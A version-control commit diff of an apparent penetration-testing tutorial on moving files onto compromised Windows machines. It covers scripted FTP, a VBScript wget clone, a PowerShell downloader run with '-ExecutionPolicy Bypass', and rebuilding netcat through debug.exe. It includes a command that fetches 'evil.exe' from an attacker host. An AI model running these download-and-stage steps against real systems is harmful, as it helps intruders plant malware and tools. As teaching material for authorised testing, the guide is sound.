Commit ef8dc15c authored by bobloblaw's avatar bobloblaw
Browse files

Updates transfering_files_to_windows.md 

Auto commit by GitBook Editor
parent abb54639

transfering_files_to_windows.md

+13 −13
Original line number Diff line number Diff line
@@ -2,8 +2,6 @@ 


Transferring files to linux is usually pretty easy. We can use netcat, wget, curl, which most systems have as default. But windows does not have these tools.







## FTP



Most windows machines have a ftp-client included. But we can't use it interactively since that most  likely would kill our shell. So we have get around that. We can however run commands from a file. So what we want to do is to echo out the commands into a textfile. And then use that as our input to the ftp-client. Let me demonstrate.
@@ -22,7 +20,7 @@ echo bye>> ftp.txt 
Then run this command to connect to the ftp



```

ftp v -n -s:ftp.txt

ftp -v -n -s:ftp.txt

```



Of course you need to have a ftp-server configured with the user asshat and the password to mysecretpassword.
@@ -63,6 +61,8 @@ I usually put all files I want to make available in **/usr/tftp** 


Here is a good script to make a wget-clone in VB.



If it doesn't work try piping it through unix2dos before copying it.



```

echo strUrl = WScript.Arguments.Item(0) > wget.vbs

echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
@@ -89,14 +89,12 @@ echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs

echo Next >> wget.vbs

echo ts.Close >> wget.vbs



```



You then execute the script like this:   

**cscript wget.vbs http://192.168.10.5/evil.exe evil.exe** 



The script works great and I found it at the this guys gist: https://gist.github.com/sckalath/ec7af6a1786e3de6c309

**cscript wget.vbs **[http://192.168.10.5/evil.exe](http://192.168.10.5/evil.exe)** evil.exe**



The script works great and I found it at the this guys gist: [https://gist.github.com/sckalath/ec7af6a1786e3de6c309](https://gist.github.com/sckalath/ec7af6a1786e3de6c309)



## Powershell
@@ -111,11 +109,11 @@ echo $webclient.DownloadFile($url,$file) >>wget.ps1 
```



Now we invoke it with this crazy syntax:



```

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

```





## Debug.exe



This is a crazy technique that works on windows 32 bit machines. Basically the idea is to use the debug.exe program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like netcat. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with debug.exe.
@@ -125,6 +123,7 @@ Debug.exe can only assemble 64 kb. So we need to use files smaller than that. We 
```

upx -9 nc.exe

```



Now it only weights 29 kb. Perfect.So now let's disassemble it:



```
@@ -132,3 +131,4 @@ wine exe2bat.exe nc.exe nc.txt 
```



Perfect, now we just copy-past the text into our windows-shell. And it will automatically create a file called nc.exe